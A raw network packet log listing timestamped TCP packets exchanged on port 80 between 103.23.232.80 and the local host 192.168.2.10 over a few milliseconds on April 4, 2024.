Apr 4, 2024 17:49:07.217328072 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.217348099 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.217348099 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.217367887 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.217386961 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.217406034 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.217417955 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.217430115 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.217453957 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.217500925 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.217519045 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.217536926 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.217538118 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.217556953 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.217562914 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.217576027 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.217596054 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.217634916 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.217668056 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.217686892 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.217703104 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.217705965 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.217725039 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.217761993 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.217780113 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.217812061 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.217835903 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.217854977 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.217875957 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.217889071 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.217907906 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.217920065 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.217936039 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.217972994 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.217974901 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.217995882 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.218015909 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.218029022 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.218035936 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.218055964 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.218074083 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.218086958 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.218111038 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.218131065 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.218146086 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.218166113 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.218178988 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.218184948 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.218204021 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.218219995 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.218223095 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.218259096 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.218276978 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.218291998 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.218313932 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.218333960 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.218348980 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.218368053 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.218385935 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.218386889 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.218404055 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.218424082 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.218427896 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.218444109 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.218451977 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.218534946 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.218549967 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.218568087 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.218569994 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.218611002 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.218626022 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.218641996 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.218660116 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.218677998 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.218697071 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.218717098 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.218719006 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.218785048 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.218803883 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.218841076 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.218869925 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.218887091 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.218924046 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.218940973 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.218956947 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.218976021 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.218980074 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.218996048 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.219013929 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.219034910 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.219039917 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.219054937 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.219058990 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.219075918 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.219094992 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.219110966 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.219130039 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.219147921 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.219166040 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.219166040 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.219188929 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.219218969 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.219238043 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.219258070 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.219270945 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.219293118 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.219294071 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.219330072 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.219348907 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.219362974 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.219424009 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.219439983 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.219459057 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.219474077 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.219476938 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.219496965 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.219496965 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.219530106 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.219533920 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.219571114 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.219589949 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.219623089 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.219624043 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.219643116 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.219675064 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.219700098 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.219718933 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.219733953 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.219738960 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.219757080 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.219774961 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.219790936 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.219813108 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.219829082 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.219846964 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.219880104 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.219918013 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.219933033 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.219952106 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.219970942 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.219970942 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.220005989 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.220007896 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.220027924 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.220046997 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.220065117 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.220065117 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.220082998 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.220104933 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.220120907 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.220158100 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.220159054 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.220196962 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.220215082 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.220233917 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.220240116 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.220276117 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.220299006 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.220314980 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.220334053 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.220371008 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.220390081 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.220407009 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.220426083 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.220446110 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.220457077 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.220462084 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.220499039 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.220515013 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.220534086 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.220549107 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.220582008 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.220587969 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.220606089 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.220623970 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.220642090 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.220644951 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.220678091 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.220685005 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.220699072 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.220716953 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.220736027 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.220752001 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.220757008 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.220772028 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.220808983 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.220828056 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.220863104 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.220896006 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.220911980 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.220942974 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.220982075 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.221002102 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.221014977 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.221025944 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.221040964 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.221060038 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.221074104 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.221077919 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.221098900 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.221116066 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.221143961 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.221151114 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.221170902 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.221189976 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.221208096 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.221225977 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.221226931 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.221246958 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.221246958 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.221283913 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.221318960 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.221389055 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.221405029 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.221424103 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.221438885 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.221465111 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.221477985 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.221498013 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.221517086 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.221532106 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.221553087 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.221606016 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.221621037 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.221637964 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.221642017 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.221698046 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.221702099 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.221718073 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.221734047 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.221752882 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.221755981 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.221776962 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.221791029 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.221844912 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.221863985 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.221879959 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.221883059 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.221901894 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.221915007 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.221921921 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.221940994 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.221956015 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.221959114 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.221978903 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.222037077 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.222078085 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.222107887 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.222125053 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.222143888 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.222162962 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.222178936 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.222196102 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.222242117 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.222284079 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.222300053 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.222315073 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.222326040 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.222358942 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.222390890 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.222403049 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.222412109 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.222421885 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.222434044 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.222450972 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.222469091 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.222481966 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.222492933 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.222505093 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.222512960 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.222565889 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.222584963 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.222603083 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.222619057 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.222628117 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.222637892 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.222671032 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.222697020 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.222716093 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.222733974 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.222749949 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.222757101 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.222773075 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.222807884 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.222832918 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.222883940 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.222915888 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.222943068 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.222971916 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.222996950 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.223012924 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.223035097 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.223047972 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.223089933 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.223108053 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.223141909 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.223166943 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.223182917 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.223202944 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.223218918 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.223222017 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.223236084 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.223243952 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.223280907 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.223313093 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.223324060 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.223340034 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.223373890 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.223407030 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.223442078 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.223472118 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.223486900 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.223505020 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.223520994 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.223524094 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.223563910 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.223578930 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.223597050 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.223617077 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.223639011 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.223660946 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.223676920 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.223758936 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.223803043 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.223817110 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.223835945 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.223841906 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.223855019 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.223874092 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.223880053 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.223903894 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.224044085 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.224060059 CEST	80	49730	103.23.232.80	192.168.2.10
